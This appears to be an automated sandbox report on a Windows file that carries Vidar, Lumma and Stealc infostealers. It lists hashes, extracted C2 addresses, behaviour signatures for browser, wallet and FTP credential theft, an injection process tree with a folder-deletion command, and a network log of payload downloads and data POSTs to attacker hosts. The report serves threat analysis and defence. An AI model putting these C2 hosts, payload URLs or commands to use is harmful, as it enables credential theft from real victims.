Analysis

  • max time kernel
    93s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    30-09-2024 10:39

General

  • Target

    file.exe

  • Size

    404KB

  • MD5

    24ee596bc8112bf2fb1a2bb592de5f48

  • SHA1

    b68b950551a71f04e1ecdda894ce35b7702a18c2

  • SHA256

    605f0e1ad907d5585d5a3ad94244e5ee606e0a16ef99ae51b1557c8ccbaab901

  • SHA512

    e6f5dd23b0ca48e871a1193b1cf46b011aab00a051db109c64d8ac38176bbd2b176ddaefbd47df17cd59f76529ea4c997cb11edb2ff47fe5fd3a5f92b1edc512

  • SSDEEP

    12288:rX25ztpOkX88ZnbKnBVRYRzv3UcwtfDWXBcJ45G35UEO:TC6s889Yr0D3UcqWXBwWy5Ut

Malware Config

Extracted

Family

vidar

Version

11

Botnet

486564c74cdd6745c0139d65a01027e6

C2

https://t.me/jamsemlg

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

lumma

Extracted

Family

vidar

Version

11

Botnet

a669a86f8433a1e88901711c0f772c97

C2

https://t.me/jamsemlg

https://steamcommunity.com/profiles/76561199780418869

https://t.me/ae5ed

Attributes
  • user_agent

    Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0

Extracted

Family

stealc

Botnet

default

C2

http://46.8.231.109

Attributes
  • url_path

    /c4754d4f680ead72.php

Extracted

Family

lumma

C2

https://possiwreeste.site/api

https://underlinemdsj.site/api

https://chaptermusu.store/api

Signatures

  • Detect Vidar Stealer 20 IoCs
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Stealc

    Stealc is an infostealer written in C++.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 4 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steals credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Suspicious use of SetThreadContext 5 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerates browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 16 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:5088
    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
      2⤵
      • Checks computer location settings
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      • Checks processor information in registry
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:532
      • C:\ProgramData\AAEHDAAKEH.exe
        "C:\ProgramData\AAEHDAAKEH.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4724
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1944
      • C:\ProgramData\CAKKKFBFID.exe
        "C:\ProgramData\CAKKKFBFID.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetThreadContext
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3064
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
          4⤵
          PID:400
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            • System Location Discovery: System Language Discovery
            • Checks processor information in registry
            • Suspicious behavior: EnumeratesProcesses
            PID:2556
        • C:\ProgramData\HJDGCGDBGC.exe
          "C:\ProgramData\HJDGCGDBGC.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4024
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            4⤵
            PID:3320
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              4⤵
              PID:3344
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                4⤵
                • Checks computer location settings
                • Loads dropped DLL
                • System Location Discovery: System Language Discovery
                • Checks processor information in registry
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of WriteProcessMemory
                PID:5040
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCAAEBFHJJ.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:4468
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\AdminFCAAEBFHJJ.exe"
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:3596
                  • C:\Users\AdminFCAAEBFHJJ.exe
                    "C:\Users\AdminFCAAEBFHJJ.exe"
                    6⤵
                    • Executes dropped EXE
                    • Suspicious use of SetThreadContext
                    • System Location Discovery: System Language Discovery
                    PID:1932
                    • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                      7⤵
                      • System Location Discovery: System Language Discovery
                      PID:2660
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JKEGHDGHCGHD" & exit
              3⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4324
              • C:\Windows\SysWOW64\timeout.exe
                timeout /t 10
                4⤵
                • System Location Discovery: System Language Discovery
                • Delays execution with timeout.exe
                PID:3456

Network

        • US
          DNS
          t.me
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          t.me
          IN A
          Response
          t.me
          IN A
          149.154.167.99
        • US
          DNS
          t.me
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          t.me
          IN A
        • US
          DNS
          28.118.140.52.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          28.118.140.52.in-addr.arpa
          IN PTR
          Response
        • NL
          GET
          https://t.me/jamsemlg
          RegAsm.exe
          Remote address:
          149.154.167.99:443
          Request
          GET /jamsemlg HTTP/1.1
          Host: t.me
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx/1.18.0
          Date: Mon, 30 Sep 2024 10:39:10 GMT
          Content-Type: text/html; charset=utf-8
          Content-Length: 12382
          Connection: keep-alive
          Set-Cookie: stel_ssid=a24a0cfbc4f6be6b71_11082954543017583655; expires=Tue, 01 Oct 2024 10:39:10 GMT; path=/; samesite=None; secure; HttpOnly
          Pragma: no-cache
          Cache-control: no-store
          X-Frame-Options: ALLOW-FROM https://web.telegram.org
          Content-Security-Policy: frame-ancestors https://web.telegram.org
          Strict-Transport-Security: max-age=35768000
        • US
          DNS
          99.167.154.149.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          99.167.154.149.in-addr.arpa
          IN PTR
          Response
        • US
          DNS
          99.167.154.149.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          99.167.154.149.in-addr.arpa
          IN PTR
        • US
          DNS
          urusvisa.com
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          urusvisa.com
          IN A
          Response
          urusvisa.com
          IN A
          5.42.101.62
        • NL
          GET
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET / HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FCFBFBFBKFIDHJKFCAFC
          Host: urusvisa.com
          Content-Length: 256
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:11 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----AAAAKJKJEBGHJKFHIDGC
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:12 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:13 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----GHIJJJEGDBFHDHJJDBAK
          Host: urusvisa.com
          Content-Length: 332
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:13 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----BKJJEBKKEHJDGCBGCFCG
          Host: urusvisa.com
          Content-Length: 4561
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:14 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • US
          DNS
          62.101.42.5.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          62.101.42.5.in-addr.arpa
          IN PTR
          Response
          62.101.42.5.in-addr.arpa
          IN PTR
          torpid-juiceaezanetwork
        • US
          DNS
          22.160.190.20.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          22.160.190.20.in-addr.arpa
          IN PTR
          Response
        • US
          DNS
          95.221.229.192.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          95.221.229.192.in-addr.arpa
          IN PTR
          Response
        • NL
          GET
          http://urusvisa.com/sql.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /sql.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:14 GMT
          Content-Type: application/octet-stream
          Content-Length: 2459136
          Last-Modified: Fri, 24 Nov 2023 13:43:06 GMT
          Connection: keep-alive
          ETag: "6560a86a-258600"
          Accept-Ranges: bytes
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: urusvisa.com
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:16 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JDAFIEHIEGDHIDGDGHDH
          Host: urusvisa.com
          Content-Length: 437
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:16 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          GET
          http://urusvisa.com/freebl3.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /freebl3.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 685392
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-a7550"
          Accept-Ranges: bytes
        • NL
          GET
          http://urusvisa.com/mozglue.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /mozglue.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 608080
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-94750"
          Accept-Ranges: bytes
        • NL
          GET
          http://urusvisa.com/msvcp140.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /msvcp140.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 450024
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-6dde8"
          Accept-Ranges: bytes
        • NL
          GET
          http://urusvisa.com/softokn3.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /softokn3.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 257872
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-3ef50"
          Accept-Ranges: bytes
        • NL
          GET
          http://urusvisa.com/vcruntime140.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /vcruntime140.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 80880
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-13bf0"
          Accept-Ranges: bytes
        • NL
          GET
          http://urusvisa.com/nss3.dll
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          GET /nss3.dll HTTP/1.1
          Host: urusvisa.com
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:17 GMT
          Content-Type: application/octet-stream
          Content-Length: 2046288
          Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
          Connection: keep-alive
          ETag: "6315a9f4-1f3950"
          Accept-Ranges: bytes
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----DAFCAAEGDBKJJKECBKFH
          Host: urusvisa.com
          Content-Length: 1025
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:18 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HJKECAAAFHJECAAAEBFC
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----HCFBKKEBKEBGIDHIEHCF
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
          Host: urusvisa.com
          Content-Length: 461
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:19 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----KFCAFIIDHIDGHIECGDGI
          Host: urusvisa.com
          Content-Length: 111897
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:21 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:21 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
          Host: urusvisa.com
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----FIIEHJDBKJKECBFHDGHJ
          Host: urusvisa.com
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----GIEHJKEBAAEBGCAAEBFH
          Host: urusvisa.com
          Content-Length: 499
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • NL
          POST
          http://urusvisa.com/
          RegAsm.exe
          Remote address:
          5.42.101.62:80
          Request
          POST / HTTP/1.1
          Content-Type: multipart/form-data; boundary=----JEGHCBAFBFHIIECBKFCG
          Host: urusvisa.com
          Content-Length: 331
          Connection: Keep-Alive
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:26 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
        • US
          DNS
          files.veritas.org.ng
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          files.veritas.org.ng
          IN A
          Response
          files.veritas.org.ng
          IN A
          147.45.44.104
        • CH
          GET
          http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2b049020f_ldnf.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:22 GMT
          Content-Type: application/octet-stream
          Content-Length: 380456
          Last-Modified: Mon, 30 Sep 2024 04:37:24 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2b04-5ce28"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • CH
          GET
          http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2afc5abea_vasd.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: application/octet-stream
          Content-Length: 414248
          Last-Modified: Mon, 30 Sep 2024 04:37:16 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2afc-65228"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • CH
          GET
          http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe
          RegAsm.exe
          Remote address:
          147.45.44.104:80
          Request
          GET /ldms/66fa2ae906657_snd.exe HTTP/1.1
          Host: files.veritas.org.ng
          Cache-Control: no-cache
          Response
          HTTP/1.1 200 OK
          Server: nginx
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Type: application/octet-stream
          Content-Length: 334376
          Last-Modified: Mon, 30 Sep 2024 04:36:57 GMT
          Connection: keep-alive
          Keep-Alive: timeout=120
          ETag: "66fa2ae9-51a28"
          X-Content-Type-Options: nosniff
          Accept-Ranges: bytes
        • US
          DNS
          58.55.71.13.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          58.55.71.13.in-addr.arpa
          IN PTR
          Response
        • US
          DNS
          104.44.45.147.in-addr.arpa
          Remote address:
          8.8.8.8:53
          Request
          104.44.45.147.in-addr.arpa
          IN PTR
          Response
        • US
          DNS
          possiwreeste.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          possiwreeste.site
          IN A
          Response
          possiwreeste.site
          IN A
          172.67.205.129
          possiwreeste.site
          IN A
          104.21.22.157
        • US
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=kfsmsvtfbo4ddsrv68h8jsuus3; expires=Fri, 24 Jan 2025 04:26:03 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gprBReNzpUvXF4Ljc59GFxYcQjhDWZLiq%2BWBtlhvIWNLu9MsMx3dGWsvw%2F%2BrZ1qidq7hKEK2mzypLVXCYNu5BL5rsnLPxvmPj06RmVcmsCzd1H1oC6f88%2FoDBaywaQJr7GjiPA%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396bfff244195-LHR
        • US
          POST
          https://possiwreeste.site/api
          RegAsm.exe
          Remote address:
          172.67.205.129:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: possiwreeste.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:24 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=os5fvp126m8v2drtq2gr0t6eql; expires=Fri, 24 Jan 2025 04:26:03 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjFLnnTG3DTDAnnH%2FXOssK8fjoF2lBiDmizr4A8nRBWYT%2FM5vNaUBMW1mM8RdHcFPHSyLAXvmy3TmmC%2BhVtV4H5hEZDsRDd7gAyT3n16dOmlX4lW81rK2zAaPWuqEag0fOZ5Uw%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8cb396c1fa734195-LHR
        • flag-us
          DNS
          famikyjdiag.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          famikyjdiag.site
          IN A
          Response
        • flag-us
          DNS
          commandejorsk.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          commandejorsk.site
          IN A
          Response
        • flag-us
          DNS
          underlinemdsj.site
          RegAsm.exe
          Remote address:
          8.8.8.8:53
          Request
          underlinemdsj.site
          IN A
          Response
          underlinemdsj.site
          IN A
          104.21.1.169
          underlinemdsj.site
          IN A
          172.67.129.166
        • flag-us
          POST
          https://underlinemdsj.site/api
          RegAsm.exe
          Remote address:
          104.21.1.169:443
          Request
          POST /api HTTP/1.1
          Connection: Keep-Alive
          Content-Type: application/x-www-form-urlencoded
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
          Content-Length: 8
          Host: underlinemdsj.site
          Response
          HTTP/1.1 200 OK
          Date: Mon, 30 Sep 2024 10:39:25 GMT
          Content-Type: text/html; charset=UTF-8
          Transfer-Encoding: chunked
          Connection: keep-alive
          Set-Cookie: PHPSESSID=pcssp65funvvv1d5fpll6srl0d; expires=Fri, 24 Jan 2025 04:26:04 GMT; Max-Age=9999999; path=/
          Expires: Thu, 19 Nov 1981 08:52:00 GMT
          Cache-Control: no-store, no-cache, must-revalidate
          Pragma: no-cache
          CF-Cache-Status: DYNAMIC
